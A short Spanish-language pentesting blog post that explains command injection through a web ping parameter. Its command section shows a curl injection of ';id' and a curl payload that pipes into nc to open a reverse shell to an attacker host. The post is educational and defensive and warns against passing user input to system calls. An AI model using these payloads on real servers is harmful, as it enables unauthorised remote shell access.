~ / blog / pentesting
KALI

Command injection

Cuando una web pasa tu entrada directo a un comando del sistema, puedes inyectar los tuyos.

Pruebas encadenando comandos con un punto y coma o una tubería en el parámetro. Si la respuesta te muestra la salida de id o de un ls, tienes ejecución de comandos en el servidor.

De ahí a una reverse shell hay un paso. Nunca metas la entrada del usuario en una llamada al sistema.

Solo con permiso.

# los comandos

kali@kali:~$ curl 'http://10.0.0.5/ping?host=8.8.8.8;id'copiar
PING 8.8.8.8 ...
uid=33(www-data) gid=33 <- inyección!
kali@kali:~$ curl 'http://10.0.0.5/ping?host=8.8.8.8|nc 10.0.0.50 4444 -e /bin/bash'copiar
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.